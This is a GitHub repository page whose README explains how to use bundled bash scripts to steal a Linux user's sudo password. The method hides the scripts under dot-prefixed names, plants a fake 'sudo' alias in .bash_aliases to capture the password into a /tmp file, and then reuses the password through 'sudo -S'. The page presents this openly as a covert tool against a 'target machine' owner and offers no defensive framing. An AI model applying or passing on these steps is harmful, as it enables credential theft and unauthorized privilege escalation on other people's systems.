Skip to content

Rablidad/Privilege-Escalation-Linux

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 

Repository files navigation

BEFORE USING THESE SCRIPTS

*-> change their names to a random file name in order to the machine's owner does not realize it's a malicious script, never forget to precede the file name with a "." (no quotes, obsviously), it will automatically hide the file, and not show them with a simple ls command by the machine's owner

1-> run the .to.sh script on the target machine, it will add a "sudo" alias inside the .bash_aliases file of the target machine 1.1-> then, when the to.sh is succesfull executed, whenever the target write "sudo " on his machine's terminal
it will not execute the real sudo, instead, it will execute the get_parameters.sh file, in which will capture the sudo password 2-> then, you just have to cat /tmp/content_extra_file to be able to see the -> username : sudo_password

after all: FINAL -> whenever you want to run a sudo command on the target machine, remember to run as follows: username@distro:~$ echo '<sudo_password>' | sudo -S

About

Basic bash scripts to get sudo password from the linux target machine

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages